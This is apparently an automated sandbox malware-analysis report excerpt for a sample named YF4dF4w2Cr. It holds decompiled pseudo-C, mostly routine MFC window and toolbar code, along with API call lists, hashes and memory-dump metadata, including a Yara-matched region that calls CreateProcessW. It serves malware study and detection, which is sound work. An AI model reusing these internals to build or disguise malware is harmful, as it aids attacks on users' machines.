                  • GetPrivateProfileIntA.KERNEL32 ref: 004265D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClosePrivateProfileQueryValue
                  • String ID:
                  • API String ID: 1423431592-0
                  • Opcode ID: 37fd7985b59ad76bee6088d2c9caf6a5d7f3d4e0e91ea3f81cef1c7659260bcd
                  • Instruction ID: 359547d3396ca64b357bdbba5d42c68a2efe29caa3992aa9148c66dea141a309
                  • Opcode Fuzzy Hash: 37fd7985b59ad76bee6088d2c9caf6a5d7f3d4e0e91ea3f81cef1c7659260bcd
                  • Instruction Fuzzy Hash: FC014676201128FBCB128F50EC04EDF3BB9FF49354F11402AF9059A154DB79EA95DBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040CC1D(struct HWND__* _a4, int _a8, signed int _a12, signed int _a16, signed int _a20) {
                  				signed int _t9;
                  				signed int _t11;
                  				long _t20;
                  
                  				_t9 = GetWindowLongA(_a4, _a8);
                  				_t20 =  !_a12 & _t9 | _a16;
                  				if(_t9 != _t20) {
                  					SetWindowLongA(_a4, _a8, _t20); // executed
                  					_t11 = _a20;
                  					if(_t11 != 0) {
                  						SetWindowPos(_a4, 0, 0, 0, 0, 0, _t11 | 0x00000017);
                  					}
                  					return 1;
                  				}
                  				return 0;
                  			}

                  APIs
                  • GetWindowLongA.USER32 ref: 0040CC28
                  • SetWindowLongA.USER32 ref: 0040CC47
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,?,?,0040CC87,?,000000F0,?,?,?,?,00412B88), ref: 0040CC62
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: d7c2172bb452d81a81af7510caec739e104399fd7b84e5bb0e8eb3e9bcce2491
                  • Instruction ID: 8d151290716614a4af326467620842b1de0e6c172b2ec37ab7e21d59d9d88d99
                  • Opcode Fuzzy Hash: d7c2172bb452d81a81af7510caec739e104399fd7b84e5bb0e8eb3e9bcce2491
                  • Instruction Fuzzy Hash: 93F08C75120008FFEF088F71DC998AE3B69FB18312B404539F80AC5160DB31DC61DA68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E00412D87(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				int _t22;
                  				int _t24;
                  				void* _t36;
                  				void* _t38;
                  
                  				_push(4);
                  				E00431A9B(E0044BD4B, __ebx, __edi, __esi);
                  				_t36 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
                  					E004014C0(_t38 - 0x10, __edx);
                  					 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x50)))) + 0x8c))(_t38 - 0x10);
                  					E004048ED(__ebx,  *((intOrPtr*)(_t36 + 0x50)), __edi, _t36,  *(_t38 + 8),  *(_t38 + 0xc),  *((intOrPtr*)(_t38 - 0x10)), 0xffffffff);
                  					_t22 = lstrlenA( *(_t38 + 8));
                  					E004010B0( *((intOrPtr*)(_t38 - 0x10)) + 0xfffffff0, _t38 - 0x10);
                  					_t24 = _t22;
                  				} else {
                  					_t24 = GetWindowTextA( *(__ecx + 0x20),  *(_t38 + 8),  *(_t38 + 0xc)); // executed
                  				}
                  				return E00431B73(_t24);
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3TextWindowlstrlen
                  • String ID:
                  • API String ID: 3549226942-0
                  • Opcode ID: b5af1ba532699d5a23646d4f2a5d320556d6468073c30116d0ca7540ada9b271
                  • Instruction ID: c23bc98a17ab587e4b111167bb2d42125b64d8fed7f86c3939704ddc0647063a
                  • Opcode Fuzzy Hash: b5af1ba532699d5a23646d4f2a5d320556d6468073c30116d0ca7540ada9b271
                  • Instruction Fuzzy Hash: 40011D35400214EFCF01AFA5CC49EAE7B71BF04328F008A69F5255A2B1DB759961DB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E00404CF2(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr _v8;
                  				char _v12;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t12;
                  				signed int _t16;
                  				void* _t17;
                  				struct HWND__* _t19;
                  				signed int _t24;
                  				signed int _t27;
                  				void* _t38;
                  				signed int _t44;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t12 = _a8;
                  				_t38 = __ecx;
                  				_t27 = 0x56000001;
                  				if(_t12 != 0) {
                  					_v12 =  *((intOrPtr*)(_t12 + 4));
                  				} else {
                  					_v12 = 0;
                  				}
                  				_t16 =  *(_a4 + 0x20) & 0x00300000;
                  				_v8 = 0xff00;
                  				if(_t16 != 0) {
                  					_t24 = _t16 | 0x56000001;
                  					_t44 = _t24;
                  					_t27 = _t24;
                  					E00412B6C(_t38, 0x300000, 0, 0x28);
                  				}
                  				_t17 = E0041F363(_t27, 0, _t38, _t44);
                  				_push( &_v12);
                  				_push( *((intOrPtr*)(_t17 + 8)));
                  				_push(0xe900);
                  				_push( *((intOrPtr*)(_t38 + 0x20)));
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(_t27);
                  				_push(0);
                  				_push("mdiclient");
                  				_push(0x200); // executed
                  				_t19 = E0040492C(_t27,  &_v12, 0, _t38, _t44); // executed
                  				 *(_t38 + 0xe8) = _t19;
                  				if(_t19 != 0) {
                  					BringWindowToTop(_t19);
                  					__eflags = 1;
                  					return 1;
                  				} else {
                  					return 0;
                  				}
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: BringWindow
                  • String ID: mdiclient
                  • API String ID: 1361440306-1999401180
                  • Opcode ID: 0afc53f6849adb919cecdf31f6e9fdba312867e3a853da981439882dcb4a5666
                  • Instruction ID: 6620486015e60b6a059689b7e1a8a8747eecd99153f1f0efe6d475f075f97d44
                  • Opcode Fuzzy Hash: 0afc53f6849adb919cecdf31f6e9fdba312867e3a853da981439882dcb4a5666
                  • Instruction Fuzzy Hash: 8D11A0B1A102047BD7248BA6CC89E6BBAECEFD9714F10442AB505D72A1E5B498008624
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00407991(void* __ebx, void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, char _a16, intOrPtr _a32) {
                  				struct tagRECT _v20;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t17;
                  				void* _t24;
                  				signed int _t28;
                  				void* _t29;
                  				signed int* _t31;
                  				void* _t34;
                  				signed int _t40;
                  
                  				_t29 = __ebx;
                  				_t34 = __ecx;
                  				E00406AAE( &_a16);
                  				_t35 = _a12;
                  				_t17 = _a12 & 0x0040ffff;
                  				_t31 = __ecx + 0x84;
                  				 *_t31 = _t17;
                  				if(_a32 == 0xe800) {
                  					_t28 = _t17 | 0x00000008;
                  					_t40 = _t28;
                  					 *_t31 = _t28;
                  				}
                  				E00411F96(_t29, _t31, _t34, _t35, _t40, 0x1000); // executed
                  				E0040791D(_t31, _t34); // executed
                  				E004064F0(_t31); // executed
                  				SetRectEmpty( &_v20);
                  				_t24 = E0040D84A(_t34, "ToolbarWindow32", 0, _t35 & 0xffbf004e | _a8 | 0x0000004e,  &_v20, _a4, _a32, 0); // executed
                  				if(_t24 != 0) {
                  					E00406DB6(_t34,  *((intOrPtr*)(_t34 + 0xb0)),  *((intOrPtr*)(_t34 + 0xb4)),  *((intOrPtr*)(_t34 + 0xa8)),  *((intOrPtr*)(_t34 + 0xac)));
                  					return 1;
                  				}
                  				return _t24;
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyRect
                  • String ID: ToolbarWindow32
                  • API String ID: 2270935405-4104838417
                  • Opcode ID: fb5b6df229c39a1bc564c3f4343866c0a1e9980edddc86798078d9dc56cba60c
                  • Instruction ID: 505957d6a176a6e826c3b6042989fcaafd5f8927dda6a395bbae33c2c064a4d4
                  • Opcode Fuzzy Hash: fb5b6df229c39a1bc564c3f4343866c0a1e9980edddc86798078d9dc56cba60c
                  • Instruction Fuzzy Hash: 9C11A572710209BBDF11AFA1CC01BDA7B69FF85358F014436F915B61D1DB38A825CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311CF2
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311D12
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311D1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D
                  • API String ID: 2922976086-2746444292
                  • Opcode ID: 3229fe4f920ac49b95222aba6fca871d4d34b36665dc72c1105e7d626ea6d01a
                  • Instruction ID: 92723614778f17a721474af575f57b2bcf76421b23926c35c065e005fd340a84
                  • Opcode Fuzzy Hash: 3229fe4f920ac49b95222aba6fca871d4d34b36665dc72c1105e7d626ea6d01a
                  • Instruction Fuzzy Hash: B4F0E9729000086BDB24CEA58C049FFB7BDEF86311F10402AEE1FEB100EB749909C5A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040B954(void* __ebx, void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                  				struct tagRECT _v20;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t11;
                  				void* _t21;
                  				void* _t22;
                  				signed int _t29;
                  				void* _t32;
                  				signed int _t37;
                  
                  				_t22 = __ebx;
                  				_t11 = _a12;
                  				_t32 = __ecx;
                  				 *(__ecx + 0x84) = _t11 & 0x0040ffff;
                  				_t26 = _a4;
                  				_t29 = _t11 & 0xffbf004e | 0x0000004e;
                  				if((E00412B38(_a4) & 0x00040000) != 0) {
                  					_t37 = _t29;
                  				}
                  				E00411F96(_t22, _t26, _t29, _t32, _t37, 0x1000);
                  				SetRectEmpty( &_v20);
                  				_t21 = E0040D84A(_t32, "msctls_statusbar32", 0, _a8 | _t29,  &_v20, _a4, _a16, 0); // executed
                  				return _t21;
                  			}













                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SetRectEmpty.USER32(?), ref: 0040B99E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyLongRectWindow
                  • String ID: msctls_statusbar32
                  • API String ID: 2293799620-4095915827
                  • Opcode ID: 85e7e89a38f6645222136ab41357720aa548ffbfdea95d73971b2ef4f0f8a088
                  • Instruction ID: 468b7fd0b6eacb9e28decebd9ac57333f4eba2f844c003510548747924e0c593
                  • Opcode Fuzzy Hash: 85e7e89a38f6645222136ab41357720aa548ffbfdea95d73971b2ef4f0f8a088
                  • Instruction Fuzzy Hash: 36F0C87270024967DB10EFA9DC06FEB3799EB84754F04443AFA19E71C1CAB8E8548658
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041346C(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                  				struct tagRECT _v20;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t15;
                  				void* _t21;
                  
                  				_t20 = __edi;
                  				_t18 = __ecx;
                  				_t17 = __ebx;
                  				_t22 = _a4;
                  				_t21 = __ecx;
                  				if(_a4 == 0) {
                  					E00406436(__ebx, __ecx, __edi, __ecx, _t22);
                  				}
                  				_t10 = _a8 & 0x0040ffff;
                  				 *(_t21 + 0x84) = _a8 & 0x0040ffff;
                  				E00411F96(_t17, _t18, _t20, _t21, _t10, 2);
                  				SetRectEmpty( &_v20);
                  				_t15 = E0040D84A(_t21, "AfxControlBar90s", 0, _a8,  &_v20, _a4, _a12, 0); // executed
                  				return _t15;
                  			}









                  APIs
                  • SetRectEmpty.USER32(?), ref: 0041349B
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyException@8H_prolog3RectThrow
                  • String ID: AfxControlBar90s
                  • API String ID: 1106273639-4082281646
                  • Opcode ID: 0fe03d747cc36f8c21c24473658bc4f8ca051e35eeafd5a74ad71c3be61d63ab
                  • Instruction ID: 904d40750636b72848055661a794ad6f36defb35cdb82f78ac122cc83c2a69a9
                  • Opcode Fuzzy Hash: 0fe03d747cc36f8c21c24473658bc4f8ca051e35eeafd5a74ad71c3be61d63ab
                  • Instruction Fuzzy Hash: 49F0823250021ABBDF20AFA5CC06FDE3B69FB40314F10842BF914AA1C1DA7895548758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00404461(void* __eflags, intOrPtr _a4) {
                  				void* _t3;
                  				intOrPtr* _t4;
                  				void* _t7;
                  				void* _t10;
                  				void* _t11;
                  				void* _t12;
                  
                  				while(1) {
                  					_t3 = E0043108C(_t7, _t10, _t11, _a4); // executed
                  					_t12 = _t3;
                  					if(_t12 != 0) {
                  						break;
                  					}
                  					_t4 =  *0x462298; // 0x404445
                  					if(_t4 != 0) {
                  						_push(_a4);
                  						if( *_t4() != 0) {
                  							continue;
                  						}
                  					}
                  					break;
                  				}
                  				return _t12;
                  			}










                  APIs
                  • _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 0043108C: __FF_MSGBANNER.LIBCMT ref: 004310AF
                    • Part of subcall function 0043108C: __NMSG_WRITE.LIBCMT ref: 004310B6
                    • Part of subcall function 0043108C: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,004381A2,00000001,00000001,00000001,?,0043A049,00000018,0045E2A8,0000000C,0043A0DA), ref: 00431103
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AllocateHeap_malloc
                  • String ID: ED@
                  • API String ID: 501242067-1809407400
                  • Opcode ID: 6e25af06defa9b9827857281b9dce4e04c166c3dc53613bcea4009c0ca779b1c
                  • Instruction ID: 390a9ce1f592537ae75951aa16ff758075523778642dbaca2e903489ec7b59e7
                  • Opcode Fuzzy Hash: 6e25af06defa9b9827857281b9dce4e04c166c3dc53613bcea4009c0ca779b1c
                  • Instruction Fuzzy Hash: D0D0C2722041256B8A1055AAEC10A5A7758CBC07F07080137FE08E62A0DA75DC0142C9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E00416609(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t36;
                  				void* _t37;
                  				intOrPtr _t39;
                  				intOrPtr _t46;
                  				intOrPtr _t47;
                  				intOrPtr _t53;
                  				void* _t55;
                  				intOrPtr _t69;
                  				void* _t72;
                  				intOrPtr _t76;
                  				void* _t80;
                  				void* _t83;
                  
                  				_t72 = __edx;
                  				_push(4);
                  				E00431A9B(E0044B3E2, __ebx, __edi, __esi);
                  				_t79 = __ecx;
                  				_t76 =  *((intOrPtr*)(_t80 + 8));
                  				_t36 =  *((intOrPtr*)(_t76 + 0x14));
                  				 *((intOrPtr*)(_t80 - 0x10)) = 1;
                  				if(_t36 == 0) {
                  					_t37 = E0041F363(0, _t76, __ecx, __eflags);
                  					_t39 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) + 0xc))(0xe100, 0, 0, 0);
                  					__eflags = _t39;
                  					if(_t39 == 0) {
                  						E00417F31(_t79);
                  					}
                  					__eflags =  *((intOrPtr*)(_t79 + 0x20));
                  					L29:
                  					if(__eflags != 0) {
                  						L31:
                  						return E00431B73( *((intOrPtr*)(_t80 - 0x10)));
                  					}
                  					L30:
                  					 *((intOrPtr*)(_t80 - 0x10)) = 0;
                  					goto L31;
                  				}
                  				_t83 = _t36 - 1;
                  				if(_t83 == 0) {
                  					_push( *((intOrPtr*)(_t76 + 0x18)));
                  					__eflags =  *((intOrPtr*)( *__ecx + 0x88))();
                  					goto L29;
                  				}
                  				if(_t83 <= 0) {
                  					goto L31;
                  				}
                  				if(_t36 <= 3) {
                  					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                  					_push( *((intOrPtr*)(_t76 + 0x18)));
                  					_t46 =  *((intOrPtr*)( *__ecx + 0x88))();
                  					__eflags = _t46;
                  					if(_t46 != 0) {
                  						_t47 =  *((intOrPtr*)(__ecx + 0x20));
                  						 *((intOrPtr*)(__ecx + 0x8c)) = _t76;
                  						__eflags = _t47;
                  						if(__eflags == 0) {
                  							_t47 = E00406436(0, __ecx, _t76, __ecx, __eflags);
                  						}
                  						SendMessageA( *(_t47 + 0x20), 0x111, 0xe108, 0);
                  						 *((intOrPtr*)(_t79 + 0x8c)) = 0;
                  					}
                  					goto L30;
                  				}
                  				if(_t36 == 4) {
                  					 *((intOrPtr*)(__ecx + 0x8c)) =  *((intOrPtr*)(__ecx + 0x4c));
                  					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                  					goto L31;
                  				}
                  				if(_t36 == 5) {
                  					 *((intOrPtr*)( *__ecx + 0x80))();
                  					 *((intOrPtr*)(_t80 - 0x10)) = 0;
                  					__eflags =  *((intOrPtr*)(__ecx + 0x8c));
                  					if(__eflags != 0) {
                  						goto L31;
                  					}
                  					_t69 = E00404461(__eflags, 0x28);
                  					 *((intOrPtr*)(_t80 + 8)) = _t69;
                  					 *((intOrPtr*)(_t80 - 4)) = 0;
                  					L16:
                  					_t91 = _t69;
                  					if(_t69 == 0) {
                  						_t53 = 0;
                  						__eflags = 0;
                  					} else {
                  						_t53 = E0041576C(_t69, _t91);
                  					}
                  					 *((intOrPtr*)(_t79 + 0x8c)) = _t53;
                  					 *((intOrPtr*)(_t53 + 0x14)) = 6;
                  					goto L31;
                  				}
                  				if(_t36 != 6) {
                  					goto L31;
                  				}
                  				_t55 =  *((intOrPtr*)( *__ecx + 0x84))();
                  				if( *((intOrPtr*)(_t76 + 8)) == 0) {
                  					_push(0xffffffff);
                  					_push(0);
                  					_t89 = _t55;
                  					if(_t55 == 0) {
                  						_push(0xf10c);
                  					} else {
                  						_push(0xf10b);
                  					}
                  					E00417146(0, _t72, _t76, _t79, _t89);
                  				}
                  				 *((intOrPtr*)(_t80 - 0x10)) = 0;
                  				_t90 =  *((intOrPtr*)(_t79 + 0x8c));
                  				if( *((intOrPtr*)(_t79 + 0x8c)) != 0) {
                  					goto L31;
                  				} else {
                  					_t69 = E00404461(_t90, 0x28);
                  					 *((intOrPtr*)(_t80 + 8)) = _t69;
                  					 *((intOrPtr*)(_t80 - 4)) = 1;
                  					goto L16;
                  				}
                  			}
















                  APIs
                  • __EH_prolog3.LIBCMT ref: 00416610
                  • SendMessageA.USER32(?,00000111,0000E108,00000000), ref: 00416732
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3MessageSend
                  • String ID:
                  • API String ID: 936991600-0
                  • Opcode ID: e4de2e1b29feed0a13db066fa8e5efa98775103b20291ef35618312c6e1f6ce6
                  • Instruction ID: 70473528937c0bf9d11c87dc8b8dc0f91426da9b43ce8fb73777ee02d115459c
                  • Opcode Fuzzy Hash: e4de2e1b29feed0a13db066fa8e5efa98775103b20291ef35618312c6e1f6ce6
                  • Instruction Fuzzy Hash: 4F414F74600611DFDB249F69C888AAAB7F0BB58308F11893FE156D7391DB78D8C18F59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E004185A1(void* __ebx, intOrPtr* __ecx, void* __edx, void* __eflags, signed int _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                  				struct tagRECT _v20;
                  				signed int _v24;
                  				signed int _v36;
                  				char _v68;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t37;
                  				signed int _t38;
                  				signed int _t49;
                  				void* _t56;
                  				void* _t78;
                  				void* _t81;
                  				intOrPtr* _t85;
                  
                  				_t90 = __eflags;
                  				_t78 = __edx;
                  				_t56 = __ebx;
                  				_push(_t81);
                  				_t85 = __ecx;
                  				 *((intOrPtr*)(__ecx + 0x8c)) = _a28;
                  				E00411F96(__ebx, __ecx, _t81, __ecx, __eflags, 0x10);
                  				E00411F96(__ebx, __ecx, _t81, __ecx, _t90, 0x3c000);
                  				E00431160(0,  &_v68, 0, 0x30);
                  				if(_a12 == 0) {
                  					_a12 = 0x50800000;
                  				}
                  				_v36 = _a12;
                  				_push( &_v68);
                  				if( *((intOrPtr*)( *_t85 + 0x64))() != 0) {
                  					_t37 = E00417E26(_t85, _t78, __eflags,  *((intOrPtr*)(_t85 + 0x88)), _a20); // executed
                  					__eflags = _t37;
                  					if(_t37 == 0) {
                  						goto L3;
                  					} else {
                  						 *((intOrPtr*)(_t85 + 0x8c)) = 0;
                  						E00412B6C(_t85, 0xc00000, _v36 & 0x00c00000, 0);
                  						E00412B98(_t85, 0x200, _v24 & 0x00000200, 0);
                  						E00412C0B(_t85, _a24);
                  						GetWindowRect( *(_t85 + 0x20),  &_v20);
                  						E00419E93(_t56, _t85, 0, _t85, __eflags, 1, _v20.right - _v20.left, _v20.bottom - _v20.top, 0x4527fc, 0x4527fc);
                  						_t49 = E004122AD(_t85,  *((intOrPtr*)(_t85 + 0x88)));
                  						__eflags = _t49;
                  						if(_t49 == 0) {
                  							goto L3;
                  						} else {
                  							_t50 = _a16;
                  							_push(_t56);
                  							E00412D05(_t85, 0,  *_a16,  *((intOrPtr*)(_t50 + 4)),  *((intOrPtr*)(_t50 + 8)) -  *_a16,  *((intOrPtr*)(_t50 + 0xc)) -  *((intOrPtr*)(_t50 + 4)), 0x14); // executed
                  							__eflags = _a12 & 0x10000000;
                  							if((_a12 & 0x10000000) != 0) {
                  								E00412C34(_t85, 1); // executed
                  							}
                  							_t38 = 1;
                  							__eflags = 1;
                  						}
                  					}
                  				} else {
                  					L3:
                  					_t38 = 0;
                  				}
                  				return _t38;
                  			}


















                  APIs
                    • Part of subcall function 00411F96: _memset.LIBCMT ref: 00411FC6
                  • _memset.LIBCMT ref: 004185D0
                    • Part of subcall function 00417E26: FindResourceA.KERNEL32(?,?,00000005), ref: 00417E42
                    • Part of subcall function 00417E26: LoadResource.KERNEL32(?,00000000), ref: 00417E4A
                    • Part of subcall function 00417E26: LockResource.KERNEL32(00000000), ref: 00417E57
                    • Part of subcall function 00417E26: FreeResource.KERNEL32(00000000,00000000,?,?), ref: 00417E6F
                  • GetWindowRect.USER32 ref: 00418653
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$_memset$FindFreeLoadLockRectWindow
                  • String ID:
                  • API String ID: 2572468386-0
                  • Opcode ID: 2c2feab1a74483de2365b3fae192b7c3f521a05bb95ecf08c35458e0af3a68d2
                  • Instruction ID: cc6bf4f3222145c678c235a5d4e7989ebcd45410e0d0120669b6de292d8644ed
                  • Opcode Fuzzy Hash: 2c2feab1a74483de2365b3fae192b7c3f521a05bb95ecf08c35458e0af3a68d2
                  • Instruction Fuzzy Hash: EE313971600209AFEB14EF69CD55FBF77A9EB88704F00411EF906D3291DBB8AD518A68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E0040ACDF(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t29;
                  				void* _t31;
                  				struct HMENU__* _t36;
                  				signed short _t63;
                  				intOrPtr* _t66;
                  				void* _t67;
                  				void* _t68;
                  
                  				_t61 = __edx;
                  				_t46 = __ebx;
                  				_push(4);
                  				E00431A9B(E0044AE45, __ebx, __edi, __esi);
                  				_t66 = __ecx;
                  				_t63 =  *(_t68 + 8);
                  				 *(__ecx + 0xa4) = _t63;
                  				E004014C0(_t68 + 8, __edx);
                  				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                  				_t52 = _t68 + 8;
                  				_t29 = E00402720(_t68 + 8, _t63);
